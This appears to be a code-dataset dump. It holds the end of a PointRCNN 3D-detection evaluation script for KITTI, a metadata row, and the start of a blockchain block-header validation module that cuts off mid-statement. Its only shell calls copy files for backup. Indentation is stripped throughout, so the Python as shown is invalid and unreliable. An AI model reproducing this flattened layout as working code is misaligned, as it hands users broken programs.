total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num = (gt_max_iou > 0.7).sum().item()
total_gt_bbox += gt_num
iou3d_in = iou3d_utils.boxes_iou3d_gpu(roi_boxes3d, gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (gt_max_iou_in > thresh).sum().item()
# classification accuracy
cls_label = (gt_iou > cfg.RCNN.CLS_FG_THRESH).float()
cls_valid_mask = ((gt_iou >= cfg.RCNN.CLS_FG_THRESH) | (gt_iou <= cfg.RCNN.CLS_BG_THRESH)).float()
cls_acc = ((pred_classes == cls_label.long()).float() * cls_valid_mask).sum() / max(cls_valid_mask.sum(), 1.0)
iou_thresh = 0.7 if cfg.CLASSES == 'Car' else 0.5
cls_label_refined = (gt_iou >= iou_thresh).float()
cls_acc_refined = (pred_classes == cls_label_refined.long()).float().sum() / max(cls_label_refined.shape[0], 1.0)
total_cls_acc += cls_acc.item()
total_cls_acc_refined += cls_acc_refined.item()
disp_dict['recall'] = '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)
disp_dict['cls_acc_refined'] = '%.2f' % cls_acc_refined.item()
progress_bar.set_postfix(disp_dict)
progress_bar.update()
image_shape = dataset.get_image_shape(sample_id)
if args.save_result:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
calib = dataset.get_calib(sample_id)
save_kitti_format(sample_id, calib, roi_boxes3d_np, roi_output_dir, roi_scores, image_shape)
save_kitti_format(sample_id, calib, pred_boxes3d_np, refine_output_dir, raw_scores.cpu().numpy(),
image_shape)
# NMS and scoring
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
if inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[inds]
raw_scores_selected = raw_scores[inds]
# NMS thresh
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu().numpy(), scores_selected.cpu().numpy()
calib = dataset.get_calib(sample_id)
final_total += pred_boxes3d_selected.shape[0]
save_kitti_format(sample_id, calib, pred_boxes3d_selected, final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir, '..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
logger.info('empty_cnt=%d: dump empty file %s' % (empty_cnt, cur_file))
ret_dict = {'empty_cnt': empty_cnt}
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info(str(datetime.now()))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(cnt, 1.0))
logger.info('final average detections: %.3f' % avg_det_num)
logger.info('final average cls acc: %.3f' % avg_cls_acc)
logger.info('final average cls acc refined: %.3f' % avg_cls_acc_refined)
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total roi bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_roi_recalled_bbox_list[idx],
total_gt_bbox, cur_roi_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
logger.info('Averate Precision:')
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
logger.info(ap_result_str)
ret_dict.update(ap_dict)
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch_joint(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(666)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'TEST' if args.test else 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if args.save_result:
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
rpn_output_dir = os.path.join(result_dir, 'rpn_result', 'data')
os.makedirs(rpn_output_dir, exist_ok=True)
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
logger.info('---- EPOCH %s JOINT EVALUATION ----' % epoch_id)
logger.info('==> Output file: %s' % result_dir)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = total_rpn_iou = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
cnt += 1
sample_id, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
batch_size = len(sample_id)
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs}
# model inference
ret_dict = model(input_data)
roi_scores_raw = ret_dict['roi_scores_raw'] # (B, M)
roi_boxes3d = ret_dict['rois'] # (B, M, 7)
seg_result = ret_dict['seg_result'].long() # (B, N)
rcnn_cls = ret_dict['rcnn_cls'].view(batch_size, -1, ret_dict['rcnn_cls'].shape[1])
rcnn_reg = ret_dict['rcnn_reg'].view(batch_size, -1, ret_dict['rcnn_reg'].shape[1]) # (B, M, C)
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
assert False
pred_boxes3d = decode_bbox_target(roi_boxes3d.view(-1, 7), rcnn_reg.view(-1, rcnn_reg.shape[-1]),
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True).view(batch_size, -1, 7)
# scoring
if rcnn_cls.shape[2] == 1:
raw_scores = rcnn_cls # (B, M, 1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
recalled_num = gt_num = rpn_iou = 0
if not args.test:
if not cfg.RPN.FIXED:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
rpn_cls_label = torch.from_numpy(rpn_cls_label).cuda(non_blocking=True).long()
gt_boxes3d = data['gt_boxes3d']
for k in range(batch_size):
# calculate recall
cur_gt_boxes3d = gt_boxes3d[k]
tmp_idx = cur_gt_boxes3d.__len__() - 1
while tmp_idx >= 0 and cur_gt_boxes3d[tmp_idx].sum() == 0:
tmp_idx -= 1
if tmp_idx >= 0:
cur_gt_boxes3d = cur_gt_boxes3d[:tmp_idx + 1]
cur_gt_boxes3d = torch.from_numpy(cur_gt_boxes3d).cuda(non_blocking=True).float()
iou3d = iou3d_utils.boxes_iou3d_gpu(pred_boxes3d[k], cur_gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num += (gt_max_iou > 0.7).sum().item()
gt_num += cur_gt_boxes3d.shape[0]
total_gt_bbox += cur_gt_boxes3d.shape[0]
# original recall
iou3d_in = iou3d_utils.boxes_iou3d_gpu(roi_boxes3d[k], cur_gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (gt_max_iou_in > thresh).sum().item()
if not cfg.RPN.FIXED:
fg_mask = rpn_cls_label > 0
correct = ((seg_result == rpn_cls_label) & fg_mask).sum().float()
union = fg_mask.sum().float() + (seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
total_rpn_iou += rpn_iou.item()
disp_dict = {'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
if args.save_result:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
roi_scores_raw_np = roi_scores_raw.cpu().numpy()
raw_scores_np = raw_scores.cpu().numpy()
rpn_cls_np = ret_dict['rpn_cls'].cpu().numpy()
rpn_xyz_np = ret_dict['backbone_xyz'].cpu().numpy()
seg_result_np = seg_result.cpu().numpy()
output_data = np.concatenate((rpn_xyz_np, rpn_cls_np.reshape(batch_size, -1, 1),
seg_result_np.reshape(batch_size, -1, 1)), axis=2)
for k in range(batch_size):
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, roi_boxes3d_np[k], roi_output_dir,
roi_scores_raw_np[k], image_shape)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_np[k], refine_output_dir,
raw_scores_np[k], image_shape)
output_file = os.path.join(rpn_output_dir, '%06d.npy' % cur_sample_id)
np.save(output_file, output_data.astype(np.float32))
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
for k in range(batch_size):
cur_inds = inds[k].view(-1)
if cur_inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[k, cur_inds]
raw_scores_selected = raw_scores[k, cur_inds]
norm_scores_selected = norm_scores[k, cur_inds]
# NMS thresh
# rotated nms
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH).view(-1)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu().numpy(), scores_selected.cpu().numpy()
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
final_total += pred_boxes3d_selected.shape[0]
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_selected, final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir, '..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
logger.info('empty_cnt=%d: dump empty file %s' % (empty_cnt, cur_file))
ret_dict = {'empty_cnt': empty_cnt}
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info(str(datetime.now()))
avg_rpn_iou = (total_rpn_iou / max(cnt, 1.0))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(len(dataset), 1.0))
logger.info('final average detections: %.3f' % avg_det_num)
logger.info('final average rpn_iou refined: %.3f' % avg_rpn_iou)
logger.info('final average cls acc: %.3f' % avg_cls_acc)
logger.info('final average cls acc refined: %.3f' % avg_cls_acc_refined)
ret_dict['rpn_iou'] = avg_rpn_iou
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total roi bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_roi_recalled_bbox_list[idx],
total_gt_bbox, cur_roi_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
logger.info('Averate Precision:')
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
logger.info(ap_result_str)
ret_dict.update(ap_dict)
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch(model, dataloader, epoch_id, result_dir, logger):
if cfg.RPN.ENABLED and not cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_rpn(model, dataloader, epoch_id, result_dir, logger)
elif not cfg.RPN.ENABLED and cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_rcnn(model, dataloader, epoch_id, result_dir, logger)
elif cfg.RPN.ENABLED and cfg.RCNN.ENABLED:
ret_dict = eval_one_epoch_joint(model, dataloader, epoch_id, result_dir, logger)
else:
raise NotImplementedError
return ret_dict
def load_part_ckpt(model, filename, logger, total_keys=-1):
if os.path.isfile(filename):
logger.info("==> Loading part model from checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
model_state = checkpoint['model_state']
update_model_state = {key: val for key, val in model_state.items() if key in model.state_dict()}
state_dict = model.state_dict()
state_dict.update(update_model_state)
model.load_state_dict(state_dict)
update_keys = update_model_state.keys().__len__()
if update_keys == 0:
raise RuntimeError
logger.info("==> Done (loaded %d/%d)" % (update_keys, total_keys))
else:
raise FileNotFoundError
def load_ckpt_based_on_args(model, logger):
if args.ckpt is not None:
train_utils.load_checkpoint(model, filename=args.ckpt, logger=logger)
total_keys = model.state_dict().keys().__len__()
if cfg.RPN.ENABLED and args.rpn_ckpt is not None:
load_part_ckpt(model, filename=args.rpn_ckpt, logger=logger, total_keys=total_keys)
if cfg.RCNN.ENABLED and args.rcnn_ckpt is not None:
load_part_ckpt(model, filename=args.rcnn_ckpt, logger=logger, total_keys=total_keys)
def eval_single_ckpt(root_result_dir):
root_result_dir = os.path.join(root_result_dir, 'eval')
# set epoch_id and output dir
num_list = re.findall(r'\d+', args.ckpt) if args.ckpt is not None else []
epoch_id = num_list[-1] if num_list.__len__() > 0 else 'no_number'
root_result_dir = os.path.join(root_result_dir, 'epoch_%s' % epoch_id, cfg.TEST.SPLIT)
if args.test:
root_result_dir = os.path.join(root_result_dir, 'test_mode')
if args.extra_tag != 'default':
root_result_dir = os.path.join(root_result_dir, args.extra_tag)
os.makedirs(root_result_dir, exist_ok=True)
log_file = os.path.join(root_result_dir, 'log_eval_one.txt')
logger = create_logger(log_file)
logger.info('**********************Start logging**********************')
for key, val in vars(args).items():
logger.info("{:16} {}".format(key, val))
save_config_to_file(cfg, logger=logger)
# create dataloader & network
test_loader = create_dataloader(logger)
model = PointRCNN(num_classes=test_loader.dataset.num_class, use_xyz=True, mode='TEST')
model.cuda()
# copy important files to backup
backup_dir = os.path.join(root_result_dir, 'backup_files')
os.makedirs(backup_dir, exist_ok=True)
os.system('cp *.py %s/' % backup_dir)
os.system('cp ../lib/net/*.py %s/' % backup_dir)
os.system('cp ../lib/datasets/kitti_rcnn_dataset.py %s/' % backup_dir)
# load checkpoint
load_ckpt_based_on_args(model, logger)
# start evaluation
eval_one_epoch(model, test_loader, epoch_id, root_result_dir, logger)
def get_no_evaluated_ckpt(ckpt_dir, ckpt_record_file):
ckpt_list = glob.glob(os.path.join(ckpt_dir, '*checkpoint_epoch_*.pth'))
ckpt_list.sort(key=os.path.getmtime)
evaluated_ckpt_list = [float(x.strip()) for x in open(ckpt_record_file, 'r').readlines()]
for cur_ckpt in ckpt_list:
num_list = re.findall('checkpoint_epoch_(.*).pth', cur_ckpt)
if num_list.__len__() == 0:
continue
epoch_id = num_list[-1]
if float(epoch_id) not in evaluated_ckpt_list and int(float(epoch_id)) >= args.start_epoch:
return epoch_id, cur_ckpt
return -1, None
def repeat_eval_ckpt(root_result_dir, ckpt_dir):
root_result_dir = os.path.join(root_result_dir, 'eval', 'eval_all_' + args.extra_tag)
os.makedirs(root_result_dir, exist_ok=True)
log_file = os.path.join(root_result_dir, 'log_eval_all_%s.txt' % cfg.TEST.SPLIT)
logger = create_logger(log_file)
logger.info('**********************Start logging**********************')
# save config
for key, val in vars(args).items():
logger.info("{:16} {}".format(key, val))
save_config_to_file(cfg, logger=logger)
# create dataloader & network
test_loader = create_dataloader(logger)
model = PointRCNN(num_classes=test_loader.dataset.num_class, use_xyz=True, mode='TEST')
model.cuda()
# copy important files to backup
backup_dir = os.path.join(root_result_dir, 'backup_files')
os.makedirs(backup_dir, exist_ok=True)
os.system('cp *.py %s/' % backup_dir)
os.system('cp ../lib/net/*.py %s/' % backup_dir)
os.system('cp ../lib/datasets/kitti_rcnn_dataset.py %s/' % backup_dir)
# evaluated ckpt record
ckpt_record_file = os.path.join(root_result_dir, 'eval_list_%s.txt' % cfg.TEST.SPLIT)
with open(ckpt_record_file, 'a'):
pass
# tensorboard log
tb_log = SummaryWriter(log_dir=os.path.join(root_result_dir, 'tensorboard_%s' % cfg.TEST.SPLIT))
while True:
# check whether there is checkpoint which is not evaluated
cur_epoch_id, cur_ckpt = get_no_evaluated_ckpt(ckpt_dir, ckpt_record_file)
if cur_epoch_id == -1 or int(float(cur_epoch_id)) < args.start_epoch:
wait_second = 30
print('Wait %s second for next check: %s' % (wait_second, ckpt_dir))
time.sleep(wait_second)
continue
# load checkpoint
train_utils.load_checkpoint(model, filename=cur_ckpt)
# start evaluation
cur_result_dir = os.path.join(root_result_dir, 'epoch_%s' % cur_epoch_id, cfg.TEST.SPLIT)
tb_dict = eval_one_epoch(model, test_loader, cur_epoch_id, cur_result_dir, logger)
step = int(float(cur_epoch_id))
if step == float(cur_epoch_id):
for key, val in tb_dict.items():
tb_log.add_scalar(key, val, step)
# record this epoch which has been evaluated
with open(ckpt_record_file, 'a') as f:
print('%s' % cur_epoch_id, file=f)
logger.info('Epoch %s has been evaluated' % cur_epoch_id)
def create_dataloader(logger):
mode = 'TEST' if args.test else 'EVAL'
DATA_PATH = os.path.join('../../', 'data')
# create dataloader
test_set = KittiRCNNDataset(root_dir=DATA_PATH, npoints=cfg.RPN.NUM_POINTS,
split=cfg.TEST.SPLIT, mode=mode,
random_select=args.random_select,
rcnn_eval_roi_dir=args.rcnn_eval_roi_dir,
rcnn_eval_feature_dir=args.rcnn_eval_feature_dir,
classes=cfg.CLASSES,
logger=logger,
bgr_file=args.rpn_bgr,
mean_covariance_file=args.rpn_mean_covariance)
test_loader = DataLoader(test_set, batch_size=args.batch_size, shuffle=False, pin_memory=True,
num_workers=args.workers, collate_fn=test_set.collate_batch)
return test_loader
if __name__ == "__main__":
# merge config and log to file
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.TAG = os.path.splitext(os.path.basename(args.cfg_file))[0]
if args.eval_mode == 'rpn':
cfg.RPN.ENABLED = True
cfg.RCNN.ENABLED = False
root_result_dir = os.path.join('../', 'output', 'rpn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rpn', cfg.TAG, 'ckpt')
elif args.eval_mode == 'rcnn':
cfg.RCNN.ENABLED = True
cfg.RPN.ENABLED = cfg.RPN.FIXED = True
root_result_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG, 'ckpt')
elif args.eval_mode == 'rcnn_offline':
cfg.RCNN.ENABLED = True
cfg.RPN.ENABLED = False
root_result_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG)
ckpt_dir = os.path.join('../', 'output', 'rcnn', cfg.TAG, 'ckpt')
assert args.rcnn_eval_roi_dir is not None and args.rcnn_eval_feature_dir is not None
else:
raise NotImplementedError
if args.ckpt_dir is not None:
ckpt_dir = args.ckpt_dir
if args.output_dir is not None:
root_result_dir = args.output_dir
os.makedirs(root_result_dir, exist_ok=True)
with torch.no_grad():
if args.eval_all:
assert os.path.exists(ckpt_dir), '%s' % ckpt_dir
repeat_eval_ckpt(root_result_dir, ckpt_dir)
else:
eval_single_ckpt(root_result_dir)
| 45.946154
| 125
| 0.626558
|
babb365f884a236a29073fcb4bae1f9aa9a365a7
| 50,874
|
py
|
Python
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 7
|
2021-08-09T19:01:51.000Z
|
2021-12-09T04:32:09.000Z
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 22
|
2021-08-17T04:12:11.000Z
|
2022-03-29T04:10:38.000Z
|
cunt/consensus/block_header_validation.py
|
CallMeBrado/cunt-blockchain
|
9b140b7e5541f3baffabe02a55b75d9aeb889999
|
[
"Apache-2.0"
] | 4
|
2021-09-05T12:04:51.000Z
|
2022-03-15T08:44:32.000Z
|
import dataclasses
import logging
import time
from typing import Optional, Tuple
from blspy import AugSchemeMPL
from cunt.consensus.block_record import BlockRecord
from cunt.consensus.blockchain_interface import BlockchainInterface
from cunt.consensus.constants import ConsensusConstants
from cunt.consensus.deficit import calculate_deficit
from cunt.consensus.difficulty_adjustment import can_finish_sub_and_full_epoch
from cunt.consensus.get_block_challenge import final_eos_is_already_included, get_block_challenge
from cunt.consensus.make_sub_epoch_summary import make_sub_epoch_summary
from cunt.consensus.pot_iterations import (
calculate_ip_iters,
calculate_iterations_quality,
calculate_sp_interval_iters,
calculate_sp_iters,
is_overflow_block,
)
from cunt.consensus.vdf_info_computation import get_signage_point_vdf_info
from cunt.types.blockchain_format.classgroup import ClassgroupElement
from cunt.types.blockchain_format.sized_bytes import bytes32
from cunt.types.blockchain_format.slots import ChallengeChainSubSlot, RewardChainSubSlot, SubSlotProofs
from cunt.types.blockchain_format.vdf import VDFInfo, VDFProof
from cunt.types.end_of_slot_bundle import EndOfSubSlotBundle
from cunt.types.header_block import HeaderBlock
from cunt.types.unfinished_header_block import UnfinishedHeaderBlock
from cunt.util.errors import Err, ValidationError
from cunt.util.hash import std_hash
from cunt.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
# noinspection PyCallByClass
def validate_unfinished_header_block(
constants: ConsensusConstants,
blocks: BlockchainInterface,
header_block: UnfinishedHeaderBlock,
check_filter: bool,
expected_difficulty: uint64,
expected_sub_slot_iters: uint64,
skip_overflow_last_ss_validation: bool = False,
skip_vdf_is_valid: bool = False,
check_sub_epoch_summary=True,
) -> Tuple[Optional[uint64], Optional[ValidationError]]:
"""
Validates an unfinished header block. This is a block without the infusion VDFs (unfinished)
and without transactions and transaction info (header). Returns (required_iters, error).
This method is meant to validate only the unfinished part of the block. However, the finished_sub_slots
refers to all sub-slots that were finishes from the previous block's infusion point, up to this blocks
infusion point. Therefore, in the case where this is an overflow block, and the last sub-slot is not yet
released, header_block.finished_sub_slots will be missing one sub-slot. In this case,
skip_overflow_last_ss_validation must be set to True. This will skip validation of end of slots, sub-epochs,
and lead to other small tweaks in validation.
"""
# 1. Check that the previous block exists in the blockchain, or that it is correct
prev_b = blocks.try_block_record(header_block.prev_header_hash)
genesis_block = prev_b is None
if genesis_block and header_block.prev_header_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_BLOCK_HASH)
overflow = is_overflow_block(constants, header_block.reward_chain_block.signage_point_index)
if skip_overflow_last_ss_validation and overflow:
if final_eos_is_already_included(header_block, blocks, expected_sub_slot_iters):
skip_overflow_last_ss_validation = False
finished_sub_slots_since_prev = len(header_block.finished_sub_slots)
else:
finished_sub_slots_since_prev = len(header_block.finished_sub_slots) + 1
else:
finished_sub_slots_since_prev = len(header_block.finished_sub_slots)
new_sub_slot: bool = finished_sub_slots_since_prev > 0
can_finish_se: bool = False
can_finish_epoch: bool = False
if genesis_block:
height: uint32 = uint32(0)
assert expected_difficulty == constants.DIFFICULTY_STARTING
assert expected_sub_slot_iters == constants.SUB_SLOT_ITERS_STARTING
else:
assert prev_b is not None
height = uint32(prev_b.height + 1)
if new_sub_slot:
can_finish_se, can_finish_epoch = can_finish_sub_and_full_epoch(
constants,
blocks,
prev_b.height,
prev_b.prev_hash,
prev_b.deficit,
prev_b.sub_epoch_summary_included is not None,
)
else:
can_finish_se = False
can_finish_epoch = False
# 2. Check finished slots that have been crossed since prev_b
ses_hash: Optional[bytes32] = None
if new_sub_slot and not skip_overflow_last_ss_validation:
# Finished a slot(s) since previous block. The first sub-slot must have at least one block, and all
# subsequent sub-slots must be empty
for finished_sub_slot_n, sub_slot in enumerate(header_block.finished_sub_slots):
# Start of slot challenge is fetched from SP
challenge_hash: bytes32 = sub_slot.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
if finished_sub_slot_n == 0:
if genesis_block:
# 2a. check sub-slot challenge hash for genesis block
if challenge_hash != constants.GENESIS_CHALLENGE:
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
else:
assert prev_b is not None
curr: BlockRecord = prev_b
while not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
assert curr.finished_challenge_slot_hashes is not None
# 2b. check sub-slot challenge hash for non-genesis block
if not curr.finished_challenge_slot_hashes[-1] == challenge_hash:
print(curr.finished_challenge_slot_hashes[-1], challenge_hash)
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
else:
# 2c. check sub-slot challenge hash for empty slot
if (
not header_block.finished_sub_slots[finished_sub_slot_n - 1].challenge_chain.get_hash()
== challenge_hash
):
return None, ValidationError(Err.INVALID_PREV_CHALLENGE_SLOT_HASH)
if genesis_block:
# 2d. Validate that genesis block has no ICC
if sub_slot.infused_challenge_chain is not None:
return None, ValidationError(Err.SHOULD_NOT_HAVE_ICC)
else:
assert prev_b is not None
icc_iters_committed: Optional[uint64] = None
icc_iters_proof: Optional[uint64] = None
icc_challenge_hash: Optional[bytes32] = None
icc_vdf_input = None
if prev_b.deficit < constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
# There should be no ICC chain if the last block's deficit is 16
# Prev sb's deficit is 0, 1, 2, 3, or 4
if finished_sub_slot_n == 0:
# This is the first sub slot after the last sb, which must have deficit 1-4, and thus an ICC
curr = prev_b
while not curr.is_challenge_block(constants) and not curr.first_in_sub_slot:
curr = blocks.block_record(curr.prev_hash)
if curr.is_challenge_block(constants):
icc_challenge_hash = curr.challenge_block_info_hash
icc_iters_committed = uint64(prev_b.sub_slot_iters - curr.ip_iters(constants))
else:
assert curr.finished_infused_challenge_slot_hashes is not None
icc_challenge_hash = curr.finished_infused_challenge_slot_hashes[-1]
icc_iters_committed = prev_b.sub_slot_iters
icc_iters_proof = uint64(prev_b.sub_slot_iters - prev_b.ip_iters(constants))
if prev_b.is_challenge_block(constants):
icc_vdf_input = ClassgroupElement.get_default_element()
else:
icc_vdf_input = prev_b.infused_challenge_vdf_output
else:
# This is not the first sub slot after the last block, so we might not have an ICC
if (
header_block.finished_sub_slots[finished_sub_slot_n - 1].reward_chain.deficit
< constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
):
finished_ss = header_block.finished_sub_slots[finished_sub_slot_n - 1]
assert finished_ss.infused_challenge_chain is not None
# Only sets the icc iff the previous sub slots deficit is 4 or less
icc_challenge_hash = finished_ss.infused_challenge_chain.get_hash()
icc_iters_committed = prev_b.sub_slot_iters
icc_iters_proof = icc_iters_committed
icc_vdf_input = ClassgroupElement.get_default_element()
# 2e. Validate that there is not icc iff icc_challenge hash is None
assert (sub_slot.infused_challenge_chain is None) == (icc_challenge_hash is None)
if sub_slot.infused_challenge_chain is not None:
assert icc_vdf_input is not None
assert icc_iters_proof is not None
assert icc_challenge_hash is not None
assert sub_slot.proofs.infused_challenge_chain_slot_proof is not None
# 2f. Check infused challenge chain sub-slot VDF
# Only validate from prev_b to optimize
target_vdf_info = VDFInfo(
icc_challenge_hash,
icc_iters_proof,
